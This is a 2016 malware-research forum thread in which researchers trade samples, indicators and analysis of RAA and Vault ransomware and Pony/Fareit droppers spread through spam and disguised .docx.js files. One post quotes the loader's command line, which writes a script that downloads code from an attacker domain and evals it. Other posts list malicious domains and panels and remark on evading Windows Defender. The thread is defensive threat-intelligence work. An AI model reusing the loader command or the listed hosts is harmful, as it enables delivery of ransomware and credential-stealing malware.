[Antelox]

A new ransomware written entirely in JS which drops also Pony malware!

More info:

https://reaqta.com/2016/06/raa-ransomwa ... ring-pony/

BR,

Antelox

[xors]

Saw it on malwr this morning

https://malwr.com/analysis/YmE4MDNlMzk2 ... VhZTlkM2Y/

[Antelox]

Yes, it's the one analyzed in the blogpost. =)

BR,

Antelox

[Xylitol]

Code: Select all

dfdgdhdjdkdl.xyz/stb/

https://www.virustotal.com/en/file/fec6 ... 465979010/ 1/55

[Antelox]

This one doesn't drop Pony malware and it's obfuscated/encrypted. 2 differences in less than 24 hours, cool... =)

BR,

Antelox

[EP_X0FF]

Delivers via spam. Includes cryptolocker and bunch of additional trojans.

hxxp://alyns-medvejii-ugol.ru/?d

Original filename

Документация для контрагента от 14.06.2016. Согласовано и подписано с директором. Экспртировано из 1С-Бухгалтерия.docx.js

Muldrop trojan and it payload (Fareit + Nitol both packed with UPX to reduce their size in dropper) in attach.

Note: Despite almost FUD of muldrop, Microsoft Windows Defender will be able to detect and kill it (because of memory scan), but only if installation process will lag enough at JS dropper stage. After this system will be fucked.

[Antelox]

This should be Vault Ransomware and not RAA. In attachment the beautified javascript with small mods made by me to only drop the executable without run it (it's also drops a fake docx). Anyway the dropped exe seems to be corrupted because it crashes.

Same javascript also from here:

getxsource[.]com
flexured[.]com

Upload form maybe to update the js

getxsource[.]com/upload.php

screen_upload.png (5.72 KiB) Viewed 1007 times

BR,

Antelox

beautified_and_modified.js.zip

infected
(138.48 KiB) Downloaded 66 times

[EP_X0FF]

Have no idea, why your file is broken. In my attach above both dropper and all embedded trojans from it. Also it incorrectly work on Windows XP.

Vault messages
http://pastebin.com/u/vlt

[Antelox]

New domain:

download-file-mail\.com

Now a LNK file downloads and executes the javascript.

Code: Select all

%windir%\system32\cmd.exe /c cd %TEMP%
echo. 2>s.js
echo var r = new ActiveXObject("Msxml2.ServerXMLHTTP.6.0");r.open("GET","http://download-file-mail.com/src/src",false);r.send^(^);var b = r.responseText;eval^(b^);>s.js
start s.js

LNK: https://virustotal.com/en/file/e03b17ee ... /analysis/ - FUD
JS: https://virustotal.com/en/file/ddda0e8d ... /analysis/ - (7/55)
Pony: https://virustotal.com/en/file/3e7950eb ... /analysis/ - (13/55)

Pony panel:

fgfhfjfkfl\.xyz/admin

BR,

Antelox

Dropped files:

RAA_ 06-20-2016.zip

Infected
(363.41 KiB) Downloaded 66 times

[Antelox]

This should be Vault Ransomware and not RAA. In attachment the beautified javascript with small mods made by me to only drop the executable without run it (it's also drops a fake docx). Anyway the dropped exe seems to be corrupted because it crashes.

Same javascript also from here:

getxsource[.]com
flexured[.]com

Upload form maybe to update the js

getxsource[.]com/upload.php

The attachment screen_upload.png is no longer available

BR,

Antelox

The attachment beautified_and_modified.js.zip is no longer available

From

flexured[.]com

In attachment:
- original js;
- deobfuscated and modified js to only drop the files (vault dropper and fake docx);
- fake docx
- Vault dropper.

BR,

Antelox

Vault_06-20-2016.zip

infected
(413.22 KiB) Downloaded 79 times